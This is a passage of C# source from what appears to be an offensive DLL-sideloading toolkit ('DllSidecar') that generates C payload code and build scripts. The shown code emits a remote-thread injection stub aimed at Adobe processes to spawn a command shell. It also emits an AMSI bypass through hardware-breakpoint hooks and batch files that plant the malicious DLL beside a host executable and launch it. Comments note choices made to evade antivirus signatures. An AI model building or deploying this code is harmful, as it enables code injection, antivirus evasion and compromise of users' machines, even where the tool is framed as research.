    /// write a small position-independent stub + a ShellData struct, and kick it
    /// off with CreateRemoteThread. The stub calls CreateProcessA with
    /// STARTUPINFOA.lpDesktop = "WinSta0\\Default" so the spawned cmd is visible
    /// on the user's interactive desktop. Ported from the working BUGAINTERS-2026-005
    /// manual PoC (Adobe Acrobat Users32 sideload).
    ///
    /// PayloadData format: comma-separated target EXE names to attempt in order.
    /// Empty → Adobe/Office canon. The cmdline is a fixed banner.
    /// </summary>
    private static string GenerateSandboxEscapePayload(TemplateConfig config)
    {
        var targetsCsv = string.IsNullOrWhiteSpace(config.SandboxTargets)
            ? "AcroCEF.exe,AdobeCollabSync.exe"
            : config.SandboxTargets;
        var targetsArr = string.Join(", ",
            targetsCsv.Split(',', StringSplitOptions.RemoveEmptyEntries | StringSplitOptions.TrimEntries)
                      .Select(t => $"\"{t}\""));
        // User-chosen cmdline — "cmd.exe", "calc.exe", "cmd.exe /k whoami", etc.
        // Default to cmd+whoami banner if empty. Escape embedded backslashes + quotes
        // for the C string literal (backslash doubled, double-quotes escaped).
        var rawCmd = string.IsNullOrWhiteSpace(config.PayloadData)
            ? $"cmd.exe /k \"echo DllSidecar sandbox escape ({config.Researcher}) & whoami\""
            : config.PayloadData;
        var cmdline = rawCmd.Replace("\\", "\\\\").Replace("\"", "\\\"");
        var proof = config.WriteProofFile ? GenerateProofFileSnippet() : "";

        var sb = new StringBuilder();
        sb.AppendLine("/* Data passed to the remote stub. packed(1) so offsets match across compilers. */");
        sb.AppendLine("#pragma pack(push,1)");
        sb.AppendLine("typedef struct {");
        sb.AppendLine("    UINT_PTR pCreateProcessA;");
        sb.AppendLine("    UINT_PTR pCloseHandle;");
        sb.AppendLine("    char cmdline[512];");
        sb.AppendLine("    char desktop[32];");
        sb.AppendLine("    STARTUPINFOA si;");
        sb.AppendLine("    PROCESS_INFORMATION pi;");
        sb.AppendLine("    DWORD result;");
        sb.AppendLine("    DWORD lastError;");
        sb.AppendLine("} _sc_data_t;");
        sb.AppendLine("#pragma pack(pop)");
        sb.AppendLine();
        sb.AppendLine("/* Runs in the REMOTE process. Position-independent: only struct-field");
        sb.AppendLine("   access + function pointers resolved in the injector side (kernel32");
        sb.AppendLine("   base matches across processes on the same boot). No libc / no IAT. */");
        sb.AppendLine("static DWORD WINAPI _sc_escape(_sc_data_t *d) {");
        sb.AppendLine("    typedef BOOL (WINAPI *CP_t)(LPCSTR,LPSTR,void*,void*,BOOL,DWORD,void*,LPCSTR,LPSTARTUPINFOA,LPPROCESS_INFORMATION);");
        sb.AppendLine("    typedef BOOL (WINAPI *CH_t)(HANDLE);");
        sb.AppendLine("    CP_t fCP = (CP_t)d->pCreateProcessA;");
        sb.AppendLine("    CH_t fCH = (CH_t)d->pCloseHandle;");
        sb.AppendLine("    /* Zero structs without memset — CRT isn't reachable from remote memory. */");
        sb.AppendLine("    char *p = (char*)&d->si;");
        sb.AppendLine("    for (int i = 0; i < (int)sizeof(STARTUPINFOA); i++) p[i] = 0;");
        sb.AppendLine("    p = (char*)&d->pi;");
        sb.AppendLine("    for (int i = 0; i < (int)sizeof(PROCESS_INFORMATION); i++) p[i] = 0;");
        sb.AppendLine("    d->si.cb = sizeof(STARTUPINFOA);");
        sb.AppendLine("    d->si.lpDesktop = d->desktop;");
        sb.AppendLine("    d->si.dwFlags = 1;     /* STARTF_USESHOWWINDOW */");
        sb.AppendLine("    d->si.wShowWindow = 1; /* SW_SHOWNORMAL */");
        sb.AppendLine("    d->result = fCP(0, d->cmdline, 0, 0, 0, 0x10 /*CREATE_NEW_CONSOLE*/,");
        sb.AppendLine("                    0, 0, &d->si, &d->pi);");
        sb.AppendLine("    if (d->result) { fCH(d->pi.hProcess); fCH(d->pi.hThread); }");
        sb.AppendLine("    return d->result;");
        sb.AppendLine("}");
        sb.AppendLine("/* End marker — must follow _sc_escape in source order. With -O0 the compiler");
        sb.AppendLine("   keeps both functions contiguous, so (end - start) yields byte length. */");
        sb.AppendLine("static void _sc_escape_end(void) { }");
        sb.AppendLine();
        sb.AppendLine("static void do_payload(void) {");
        sb.Append(proof);
        sb.AppendLine($"    static const char *targets[] = {{ {targetsArr}, NULL }};");
        sb.AppendLine("    DWORD myPid = GetCurrentProcessId();");
        sb.AppendLine("    HANDLE snap = CreateToolhelp32Snapshot(2 /*TH32CS_SNAPPROCESS*/, 0);");
        sb.AppendLine("    if (snap == INVALID_HANDLE_VALUE) return;");
        sb.AppendLine("    HANDLE hTarget = NULL;");
        sb.AppendLine("    PROCESSENTRY32 pe; pe.dwSize = sizeof(pe);");
        sb.AppendLine("    for (int t = 0; targets[t] && !hTarget; t++) {");
        sb.AppendLine("        if (!Process32First(snap, &pe)) break;");
        sb.AppendLine("        do {");
        sb.AppendLine("            if (pe.th32ProcessID == myPid) continue;");
        sb.AppendLine("            if (lstrcmpiA(pe.szExeFile, targets[t]) != 0) continue;");
        sb.AppendLine("            HANDLE hP = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pe.th32ProcessID);");
        sb.AppendLine("            if (!hP) continue;");
        sb.AppendLine("            void *test = VirtualAllocEx(hP, NULL, 64,");
        sb.AppendLine("                MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE);");
        sb.AppendLine("            if (test) {");
        sb.AppendLine("                VirtualFreeEx(hP, test, 0, MEM_RELEASE);");
        sb.AppendLine("                hTarget = hP; break;");
        sb.AppendLine("            }");
        sb.AppendLine("            CloseHandle(hP);");
        sb.AppendLine("        } while (Process32Next(snap, &pe));");
        sb.AppendLine("    }");
        sb.AppendLine("    CloseHandle(snap);");
        sb.AppendLine("    if (!hTarget) return;");
        sb.AppendLine();
        sb.AppendLine("    SIZE_T codeSize = (UINT_PTR)_sc_escape_end - (UINT_PTR)_sc_escape;");
        sb.AppendLine("    if (codeSize > 4096) codeSize = 4096;");
        sb.AppendLine();
        sb.AppendLine("    HMODULE hK32 = GetModuleHandleA(\"kernel32.dll\");");
        sb.AppendLine("    _sc_data_t sd; ZeroMemory(&sd, sizeof(sd));");
        sb.AppendLine("    sd.pCreateProcessA = (UINT_PTR)GetProcAddress(hK32, \"CreateProcessA\");");
        sb.AppendLine("    sd.pCloseHandle    = (UINT_PTR)GetProcAddress(hK32, \"CloseHandle\");");
        sb.AppendLine("    lstrcpyA(sd.desktop, \"WinSta0\\\\Default\");");
        sb.AppendLine($"    lstrcpyA(sd.cmdline, \"{cmdline}\");");
        sb.AppendLine();
        sb.AppendLine("    SIZE_T total = sizeof(_sc_data_t) + codeSize + 64;");
        sb.AppendLine("    void *remoteBase = VirtualAllocEx(hTarget, NULL, total,");
        sb.AppendLine("        MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE);");
        sb.AppendLine("    if (!remoteBase) { CloseHandle(hTarget); return; }");
        sb.AppendLine("    void *remoteCode = (char*)remoteBase + sizeof(_sc_data_t);");
        sb.AppendLine("    WriteProcessMemory(hTarget, remoteBase, &sd, sizeof(sd), NULL);");
        sb.AppendLine("    WriteProcessMemory(hTarget, remoteCode, (void*)_sc_escape, codeSize, NULL);");
        sb.AppendLine("    HANDLE hThread = CreateRemoteThread(hTarget, NULL, 0,");
        sb.AppendLine("        (LPTHREAD_START_ROUTINE)remoteCode, remoteBase, 0, NULL);");
        sb.AppendLine("    if (hThread) { WaitForSingleObject(hThread, 10000); CloseHandle(hThread); }");
        sb.AppendLine("    VirtualFreeEx(hTarget, remoteBase, 0, MEM_RELEASE);");
        sb.AppendLine("    CloseHandle(hTarget);");
        sb.AppendLine("}");
        return sb.ToString();
    }

    private static string GeneratePayloadInvoke(TemplateConfig config)
    {
        var sb = new StringBuilder();
        sb.AppendLine("    static volatile LONG payload_fired = 0;");
        sb.AppendLine("    if (InterlockedCompareExchange(&payload_fired, 1, 0) == 0)");

        switch (config.Thread)
        {
            case ThreadMode.Calling:
                sb.AppendLine("        do_payload();");
                break;
            case ThreadMode.Std:
                sb.AppendLine("        CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)do_payload, NULL, 0, NULL);");
                break;
            case ThreadMode.Native:
                if (config.DirectSyscalls)
                {
                    sb.AppendLine("    {");
                    sb.AppendLine("        HANDLE hThread = NULL;");
                    sb.AppendLine("        sc_NtCreateThreadEx(&hThread, THREAD_ALL_ACCESS, NULL,");
                    sb.AppendLine("            (HANDLE)-1, (PVOID)do_payload, NULL, 0, 0, 0, 0, NULL);");
                    sb.AppendLine("    }");
                }
                else
                    sb.AppendLine("        CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)do_payload, NULL, 0, NULL);");
                break;
        }
        return sb.ToString();
    }

    private static string GenerateDefFile(PeAnalysis analysis, List<ExportEntry> exports, bool useTrampolines)
    {
        var sb = new StringBuilder();
        sb.AppendLine($"LIBRARY {Path.GetFileNameWithoutExtension(analysis.Filename)}");
        sb.AppendLine("EXPORTS");

        for (int i = 0; i < exports.Count; i++)
        {
            var label = $"tramp_{SafeLabel(exports[i].DisplayName)}";
            if (exports[i].Name != null)
                sb.AppendLine($"    {exports[i].Name} = {label} @{exports[i].Ordinal}");
            else
                sb.AppendLine($"    ord_{exports[i].Ordinal} = {label} @{exports[i].Ordinal} NONAME");
        }

        return sb.ToString();
    }

    /// <summary>
    /// True when the active evasion mix uses MSVC-only constructs and the .bat
    /// must drive cl.exe instead of MinGW gcc. Currently: AMSI HW BP (lib uses
    /// #pragma section + __declspec(allocate) + lvalue C-casts).
    /// </summary>
    private static bool RequiresMsvc(TemplateConfig config, bool isX64) =>
        config.AmsiHookHwBp && isX64;

    private static string GenerateBuildBat(PeAnalysis analysis, TemplateConfig config, string srcName, string mode)
    {
        bool isX64 = analysis.Arch == "x64";
        bool useMsvc = RequiresMsvc(config, isX64);

        var sb = new StringBuilder();
        sb.Append("@echo off\r\nsetlocal\r\n");
        if (!useMsvc)
        {
            var mingwPath = isX64 ? @"C:\msys64\mingw64\bin" : @"C:\msys64\mingw32\bin";
            sb.Append($"set \"PATH={mingwPath};%PATH%\"\r\n\r\n");
        }
        sb.Append($"echo === DllSidecar {mode} Build ===\r\n");
        sb.Append($"echo Target: {analysis.Filename} ({analysis.Arch}){(useMsvc ? " [MSVC]" : "")}\r\n\r\n");

        if (useMsvc)
        {
            EmitMsvcCompile(sb, analysis, config, srcName, isX64);
        }
        else
        {
            EmitGccCompile(sb, analysis, config, srcName, isX64);
        }
        sb.Append("if errorlevel 1 (\r\n");
        sb.Append("    echo [!] Compilation failed\r\n");
        sb.Append("    exit /b 1\r\n)\r\n\r\n");
        sb.Append($"echo [+] Built: {analysis.Filename} ({analysis.Arch})\r\n");

        // Deploy + Run + Restore tail — only when caller supplied a phantom slot
        // (typically piped from ScanPage / RuntimeTrace via PendingDeployContext).
        // Without it the .bat keeps the original compile-only behaviour.
        if (!string.IsNullOrEmpty(config.DeployTargetDir) && !string.IsNullOrEmpty(config.HostExePath))
        {
            var deployName = string.IsNullOrEmpty(config.DeployTargetName)
                ? analysis.Filename : config.DeployTargetName;
            var deployPath = Path.Combine(config.DeployTargetDir, deployName);
            var hostBaseName = Path.GetFileName(config.HostExePath);

            // Proxy mode with a known system original: drop both the proxy and
            // the renamed original so the forward chain (X_orig.Foo) resolves.
            var needsOrig = config.Mode == GenerationMode.Proxy
                && !string.IsNullOrEmpty(config.SystemOrigPath);
            var origName = Path.GetFileNameWithoutExtension(analysis.Filename) + "_orig.dll";
            var origDeployPath = Path.Combine(config.DeployTargetDir, origName);

            sb.Append("\r\n");
            sb.Append("echo.\r\n");
            sb.Append("echo === DEPLOY ===\r\n");
            // Set DEPLOY_DIR as a variable and reference via %DEPLOY_DIR% inside echo/if blocks.
            // A literal path with "(x86)" would break cmd.exe's paren-balanced block parser.
            sb.Append($"set \"DEPLOY_DIR={config.DeployTargetDir}\"\r\n");
            sb.Append($"set \"DEPLOY_PATH={deployPath}\"\r\n");
            sb.Append($"set \"HOST_EXE={config.HostExePath}\"\r\n");
            if (needsOrig)
            {
                sb.Append($"set \"ORIG_PATH={origDeployPath}\"\r\n");
                sb.Append($"set \"ORIG_SOURCE={config.SystemOrigPath}\"\r\n");
            }
            // mkdir defensively — first run on fresh machine may not have the dir yet.
            sb.Append("if not exist \"%DEPLOY_DIR%\" mkdir \"%DEPLOY_DIR%\" >nul 2>&1\r\n");
            // Write probe — fail fast with a clear message if the dir isn't writable
            // (AV container, UAC protected, locked by another process).
            sb.Append("echo probe>\"%DEPLOY_DIR%\\.dllsidecar_probe\" 2>nul\r\n");
            sb.Append("if errorlevel 1 (\r\n");
            // Quote %DEPLOY_DIR% inside the echo: cmd.exe expands %VAR% before re-parsing the
            // (...) block body, so an unquoted "(x86)" would close the block prematurely.
            sb.Append("    echo [!] Cannot write to \"%DEPLOY_DIR%\"\r\n");
            sb.Append("    echo     Check NTFS ACL / AV real-time protection / UAC virtualization\r\n");
            sb.Append("    exit /b 5\r\n");
            sb.Append(")\r\n");
            sb.Append("del \"%DEPLOY_DIR%\\.dllsidecar_probe\" >nul 2>&1\r\n");
            sb.Append($"echo [*] Copying {analysis.Filename} -^> %DEPLOY_PATH%\r\n");
            sb.Append($"copy /Y \"{analysis.Filename}\" \"%DEPLOY_PATH%\" >nul\r\n");
            sb.Append("if errorlevel 1 (\r\n");
            sb.Append("    echo [!] Deploy failed -- writable directory? UAC blocking?\r\n");
            sb.Append("    exit /b 2\r\n");
            sb.Append(")\r\n");
            sb.Append("echo [+] Deployed\r\n");
            if (needsOrig)
            {
                sb.Append($"echo [*] Copying system original {config.SystemOrigPath} -^> %ORIG_PATH%\r\n");
                sb.Append("copy /Y \"%ORIG_SOURCE%\" \"%ORIG_PATH%\" >nul\r\n");
                sb.Append("if errorlevel 1 (\r\n");
                sb.Append("    echo [!] Could not copy system original -- proxy forwards will fail.\r\n");
                sb.Append("    del \"%DEPLOY_PATH%\" >nul 2>&1\r\n");
                sb.Append("    exit /b 4\r\n");
                sb.Append(")\r\n");
                sb.Append("echo [+] Original side-copied as _orig\r\n");
            }
            sb.Append("\r\n");

            sb.Append("if not exist \"%HOST_EXE%\" (\r\n");
            sb.Append("    echo [!] Host EXE not found: \"%HOST_EXE%\"\r\n");
            sb.Append("    del \"%DEPLOY_PATH%\" >nul 2>&1\r\n");
            sb.Append("    exit /b 3\r\n");
            sb.Append(")\r\n");
            // Derive host's own directory so we can launch with CWD = install dir.
            // Many hosts (OBS, Discord, VSCode, Jetbrains tools) resolve assets
            // (locale .ini, themes, plugins) relative to CWD before falling back
            // to GetModuleFileName. Inheriting the .bat's CWD (output\<poc>\) makes
            // those lookups fail and the host aborts before our DLL is ever touched.
            sb.Append("for %%I in (\"%HOST_EXE%\") do set \"HOST_DIR=%%~dpI\"\r\n\r\n");

            sb.Append("echo === RUN ===\r\n");
            if (config.PreLaunchDelaySec > 0)
            {
                sb.Append($"echo [*] Waiting {config.PreLaunchDelaySec}s before launch (PreLaunchDelay)...\r\n");
                sb.Append($"timeout /t {config.PreLaunchDelaySec} /nobreak >nul\r\n");
            }
            sb.Append("echo [*] Launching host: %HOST_EXE%\r\n");
            if (config.WaitForHostExit)
            {
                sb.Append("echo [i] Close the host window when done -- script will then restore.\r\n");
                sb.Append("start \"\" /D \"%HOST_DIR%\" /WAIT \"%HOST_EXE%\"\r\n\r\n");
                // Trampoline launchers (Battle.net, Teams, many updaters) spawn a child and
                // exit instantly, which makes start /WAIT return before the child actually
                // loads our DLL. Pause here so the user controls when RESTORE fires.
                sb.Append("echo.\r\n");
                sb.Append("echo [i] Host process returned. If the target is a launcher/trampoline,\r\n");
                sb.Append("echo [i] the real child may still be running. Verify the payload fired,\r\n");
                sb.Append("echo [i] then press a key to clean up the deployed DLL.\r\n");
                sb.Append("pause\r\n\r\n");
            }
            else
            {
                // Fire-and-forget: start the host non-blocking, wait N seconds,
                // then dump proof file (if written by payload) and proceed to cleanup.
                sb.Append($"echo [i] Fire-and-forget mode -- will wait {config.NonBlockingTimeoutSec}s then inspect proof file.\r\n");
                sb.Append("start \"\" /D \"%HOST_DIR%\" \"%HOST_EXE%\"\r\n");
                sb.Append($"timeout /t {config.NonBlockingTimeoutSec} /nobreak >nul\r\n");
                sb.Append("echo.\r\n");
                sb.Append("echo === PROOF ===\r\n");
                // Look for the proof file the payload wrote — glob by PID is impractical
                // from batch, so we scan %TEMP% for any dllsidecar_proof_*.txt and show
                // the newest.
                sb.Append("for /f \"delims=\" %%F in ('dir /b /o-d \"%TEMP%\\dllsidecar_proof_*.txt\" 2^>nul') do (\r\n");
                sb.Append("    echo [+] Proof file: %TEMP%\\%%F\r\n");
                sb.Append("    type \"%TEMP%\\%%F\"\r\n");
                sb.Append("    goto :proof_shown\r\n");
                sb.Append(")\r\n");
                sb.Append("echo [-] No proof file found. Payload may not have fired, or WriteProofFile was off.\r\n");
                sb.Append(":proof_shown\r\n\r\n");
            }

            sb.Append("echo === RESTORE ===\r\n");
            sb.Append("echo [*] Removing deployed DLL: %DEPLOY_PATH%\r\n");
            sb.Append("del \"%DEPLOY_PATH%\" >nul 2>&1\r\n");
            sb.Append("if exist \"%DEPLOY_PATH%\" (\r\n");
            sb.Append("    echo [!] Could not delete -- still loaded? Try after host fully exits.\r\n");
            sb.Append(") else (\r\n");
            sb.Append("    echo [+] Cleaned\r\n");
            sb.Append(")\r\n");
            if (needsOrig)
            {
                sb.Append("echo [*] Removing side-copied original: %ORIG_PATH%\r\n");
                sb.Append("del \"%ORIG_PATH%\" >nul 2>&1\r\n");
            }
            sb.Append($"echo [*] Killing any lingering '{hostBaseName}' processes...\r\n");
            sb.Append($"taskkill /F /T /IM \"{hostBaseName}\" >nul 2>&1\r\n");
        }

        sb.Append("\r\n");
        sb.Append("echo.\r\n");
        sb.Append("echo === DONE ===\r\n");
        sb.Append("pause\r\n");
        return sb.ToString();
    }

    public static string GenerateRcFile(Dictionary<string, string> versionInfo, string dllName)
    {
        var fv = versionInfo.GetValueOrDefault("_file_version", "0,0,0,0");
        var pv = versionInfo.GetValueOrDefault("_product_version", "0,0,0,0");
        var fileOs = versionInfo.GetValueOrDefault("_file_os", "0x40004");
        var fileType = versionInfo.GetValueOrDefault("_file_type", "0x2");

        var stringEntries = new StringBuilder();
        foreach (var key in new[] { "CompanyName", "FileDescription", "FileVersion", "InternalName",
                                     "LegalCopyright", "OriginalFilename", "ProductName", "ProductVersion" })
        {
            var val = key switch
            {
                "OriginalFilename" => dllName,
                "InternalName" => Path.GetFileNameWithoutExtension(dllName),
                _ => versionInfo.GetValueOrDefault(key, "")
            };
            if (!string.IsNullOrEmpty(val))
            {
                var escaped = val.Replace("\\", "\\\\").Replace("\"", "\\\"");
                stringEntries.AppendLine($"            VALUE \"{key}\", \"{escaped}\"");
            }
        }

        return "#include <winver.h>\n\n"
             + "VS_VERSION_INFO VERSIONINFO\n"
             + $"FILEVERSION {fv}\n"
             + $"PRODUCTVERSION {pv}\n"
             + "FILEFLAGSMASK 0x3fL\nFILEFLAGS 0x0L\n"
             + $"FILEOS {fileOs}L\nFILETYPE {fileType}L\nFILESUBTYPE 0x0L\n"
             + "BEGIN\n    BLOCK \"StringFileInfo\"\n    BEGIN\n"
             + "        BLOCK \"040904B0\"\n        BEGIN\n"
             + stringEntries
             + "        END\n    END\n    BLOCK \"VarFileInfo\"\n    BEGIN\n"
             + "        VALUE \"Translation\", 0x0409, 0x04B0\n"
             + "    END\nEND\n";
    }

    // ──────────────────────────────────────────────────────────────────
    // Evasion technique emission
    //
    // Each Generate* method calls these to wire optional evasion modules.
    // Currently: AMSI Evasion via Hardware Breakpoint Hooks (BigPolarBear1).
    // x64-only — the bundled lib parses parameters via x64 register layout.
    // Add new techniques here as more flags land on TemplateConfig.
    // ──────────────────────────────────────────────────────────────────

    /// <summary>Returns the embedded library files when the technique is active
    /// and the target is x64. Caller merges into the output dict so MinGW
    /// compiles them alongside the proxy.</summary>
    private static Dictionary<string, string> LoadEvasionResources(TemplateConfig config, bool isX64)
    {
        var files = new Dictionary<string, string>();
        if (config.AmsiHookHwBp && isX64)
        {
            foreach (var name in new[] { "HardwareBreakPointLib.c", "HardwareBreakPointLib.h", "Structs.h" })
                files[name] = ReadEmbedded($"DllSidecar.Core.Resources.Evasion.AmsiHwBp.{name}");
        }
        return files;
    }

    private static string ReadEmbedded(string resourceName)
    {
        var asm = typeof(TemplateEngine).Assembly;
        using var stream = asm.GetManifestResourceStream(resourceName)
            ?? throw new InvalidOperationException($"Embedded resource not found: {resourceName}");
        using var reader = new StreamReader(stream);
        return reader.ReadToEnd();
    }

    /// <summary>Header includes the evasion modules need at the top of the
    /// generated proxy.c / sideload.c.</summary>
    private static string EmitEvasionIncludes(TemplateConfig config, bool isX64)
    {
        var sb = new StringBuilder();
        if (config.AmsiHookHwBp && isX64)
            sb.AppendLine("#include \"HardwareBreakPointLib.h\"");
        return sb.ToString();
    }

    /// <summary>Function definitions injected before DllMain. AmsiScanBufferDetour
    /// runs inside the VEH handler when the hardware breakpoint fires; it forces
    /// AMSI_RESULT_CLEAN (0) into the 6th arg, returns S_OK, and skips the real
    /// AmsiScanBuffer body. do_evasion_init wires it up at DLL_PROCESS_ATTACH.</summary>
    private static string EmitEvasionFunctions(TemplateConfig config, bool isX64)
    {
        if (!config.AmsiHookHwBp || !isX64) return "";
        var sb = new StringBuilder();
        sb.AppendLine();
        sb.AppendLine("/* AMSI Evasion via Hardware Breakpoint Hooks — bundled from BigPolarBear1's");
        sb.AppendLine("   HardwareBreakPointLib. Patchless: Dr0-3 + VEH handler intercepts every");
        sb.AppendLine("   AmsiScanBuffer call in this process and forces AMSI_RESULT_CLEAN. */");
        sb.AppendLine("static VOID AmsiScanBufferDetour(PCONTEXT pCtx) {");
        sb.AppendLine("    /* AmsiScanBuffer signature: HRESULT(*)(HAMSICONTEXT, PVOID, ULONG,");
        sb.AppendLine("                                            LPCWSTR, HAMSISESSION, AMSI_RESULT*);");
        sb.AppendLine("       6th arg is AMSI_RESULT* — set to AMSI_RESULT_CLEAN (0). */");
        sb.AppendLine("    PULONG pResult = (PULONG)GETPARM_6(pCtx);");
        sb.AppendLine("    if (pResult) *pResult = 0;");
        sb.AppendLine("    RETURN_VALUE(pCtx, 0);  /* S_OK */");
        sb.AppendLine("    BLOCK_REAL(pCtx);       /* skip the real AmsiScanBuffer body */");
        sb.AppendLine("}");
        sb.AppendLine();
        sb.AppendLine("static void do_evasion_init(void) {");
        sb.AppendLine("    HMODULE hAmsi = LoadLibraryA(\"amsi.dll\");");
        sb.AppendLine("    if (!hAmsi) return;");
        sb.AppendLine("    PUINT_VAR_T addr = (PUINT_VAR_T)GetProcAddress(hAmsi, \"AmsiScanBuffer\");");
        sb.AppendLine("    if (!addr) return;");
        sb.AppendLine("    if (!InitHardwareBreakpointHooking()) return;");
        sb.AppendLine("    InstallHardwareBreakingPntHook(addr, Dr0, (PVOID)AmsiScanBufferDetour, ALL_THREADS);");
        sb.AppendLine("    InstallHooksOnNewThreads(Dr0);");
        sb.AppendLine("}");
        return sb.ToString();
    }

    /// <summary>Single line called at the top of DLL_PROCESS_ATTACH. Empty
    /// when no evasion technique is active so DllMain stays unchanged.</summary>
    private static string EmitEvasionInitCall(TemplateConfig config, bool isX64) =>
        (config.AmsiHookHwBp && isX64) ? "        do_evasion_init();\n" : "";

    /// <summary>Extra source files MinGW must compile alongside proxy.c.
    /// Used by GenerateBuildBat to extend the gcc input list.</summary>
    private static List<string> EvasionExtraSources(TemplateConfig config, bool isX64)
    {
        var srcs = new List<string>();
        if (config.AmsiHookHwBp && isX64)
            srcs.Add("HardwareBreakPointLib.c");
        return srcs;
    }

    // ──────────────────────────────────────────────────────────────────
    // Compile-section emitters
    //
    // Picked by GenerateBuildBat based on RequiresMsvc(config). Both write
    // a compile invocation that produces analysis.Filename in the cwd. The
    // surrounding .bat shell (header + deploy/run tail) stays compiler-agnostic.
    // ──────────────────────────────────────────────────────────────────

    private static void EmitGccCompile(StringBuilder sb, PeAnalysis analysis, TemplateConfig config, string srcName, bool isX64)
    {
        var gccPrefix = isX64 ? "x86_64-w64-mingw32" : "i686-w64-mingw32";
        var needsHeaders = config.DInvoke || config.EncryptStrings || config.DirectSyscalls;
        var incFlag = needsHeaders ? "-I../../templates" : "";

        // Minimal flags — closer to a hand-written PoC, less signature surface for AV:
        //   · -O0 (no opt) instead of -Os -s -w: keeps symbols, looks like a debug build
        //   · no -static: dynamic link to msvcrt (always present), smaller DLL
        //   · no -luser32 -lkernel32: MinGW default spec auto-links both
        //   · -ladvapi32 kept: needed for token/SID APIs used by some payload variants
        var parts = new List<string> { $"{gccPrefix}-gcc", "-shared", "-O0",
            "-o", analysis.Filename, $"{srcName}.c", $"{srcName}.def" };
        foreach (var src in EvasionExtraSources(config, isX64)) parts.Add(src);
        if (!string.IsNullOrEmpty(incFlag)) parts.Add(incFlag);
        parts.Add("-ladvapi32");
        // -Wl,--kill-at strips the stdcall "@N" suffix from stub_ord_N exports so MinGW's
        // linker stops warning about resolving "foo by linking to foo@0". No runtime effect.
        parts.Add("-Wl,--kill-at");
        sb.Append(string.Join(" ", parts) + "\r\n");
    }

    /// <summary>
    /// Emit cl.exe-based compile prologue. Probes for vcvarsall.bat in the
    /// configured path first, then in standard VS2022/2019 install layouts so
    /// the .bat is portable across researcher boxes. After vcvarsall sets up
    /// PATH/LIB/INCLUDE, a single cl invocation builds the DLL using the
    /// generated .def for exports.
    /// </summary>
    private static void EmitMsvcCompile(StringBuilder sb, PeAnalysis analysis, TemplateConfig config, string srcName, bool isX64)
    {
        var arch = isX64 ? "x64" : "x86";
        var configuredVcvars = ConfigManager.Current.Tools.MsvcVcvarsAllPath;

        sb.Append("rem === Probe for vcvarsall.bat ===\r\n");
        sb.Append("set \"VCVARS=\"\r\n");
        if (!string.IsNullOrWhiteSpace(configuredVcvars))
            sb.Append($"if exist \"{configuredVcvars}\" set \"VCVARS={configuredVcvars}\"\r\n");
        // Probe standard install paths in priority order. First match wins.
        sb.Append("for %%E in (BuildTools Community Professional Enterprise) do (\r\n");
        sb.Append("    if not defined VCVARS if exist \"%ProgramFiles%\\Microsoft Visual Studio\\2022\\%%E\\VC\\Auxiliary\\Build\\vcvarsall.bat\" set \"VCVARS=%ProgramFiles%\\Microsoft Visual Studio\\2022\\%%E\\VC\\Auxiliary\\Build\\vcvarsall.bat\"\r\n");
        sb.Append(")\r\n");
        sb.Append("for %%E in (BuildTools Community Professional Enterprise) do (\r\n");
        sb.Append("    if not defined VCVARS if exist \"%ProgramFiles(x86)%\\Microsoft Visual Studio\\2019\\%%E\\VC\\Auxiliary\\Build\\vcvarsall.bat\" set \"VCVARS=%ProgramFiles(x86)%\\Microsoft Visual Studio\\2019\\%%E\\VC\\Auxiliary\\Build\\vcvarsall.bat\"\r\n");
        sb.Append(")\r\n");
        sb.Append("if not defined VCVARS (\r\n");
        sb.Append("    echo [!] vcvarsall.bat not found. Configure MsvcVcvarsAllPath in DllSidecar Configuration.\r\n");
        sb.Append("    exit /b 2\r\n");
        sb.Append(")\r\n");
        sb.Append($"call \"%VCVARS%\" {arch} >nul\r\n");
        sb.Append("if errorlevel 1 (\r\n");
        sb.Append("    echo [!] vcvarsall.bat failed to set up the environment\r\n");
        sb.Append("    exit /b 1\r\n");
        sb.Append(")\r\n\r\n");

        // cl args:
        //   /nologo  — quiet banner
        //   /LD      — build DLL (defines _DLL, links msvcrt-style, no entry conflict)
        //   /O2      — optimize for speed (fine for evasion lib + small payload)
        //   /Fe:     — output filename (no space after the colon)
        //   /link /DEF: — feed the .def to the linker for export table
        //
        // Import libs: cl only auto-links kernel32, NOT user32. MinGW gcc auto-
        // links both, so the gcc path doesn't need them explicit. We need:
        //   user32.lib   — MessageBoxA + wsprintfA (proof file write)
        //   advapi32.lib — token/SID APIs from payload variants (Command, etc.)
        //   kernel32.lib — explicit to be safe; usually picked via /defaultlib
        var cl = new List<string> { "cl", "/nologo", "/LD", "/O2",
            $"{srcName}.c" };
        foreach (var src in EvasionExtraSources(config, isX64)) cl.Add(src);
        cl.Add($"/Fe:{analysis.Filename}");
        cl.Add("/link");
        cl.Add($"/DEF:{srcName}.def");
        cl.Add("user32.lib");
        cl.Add("advapi32.lib");
        cl.Add("kernel32.lib");
        sb.Append(string.Join(" ", cl) + "\r\n");
    }
}
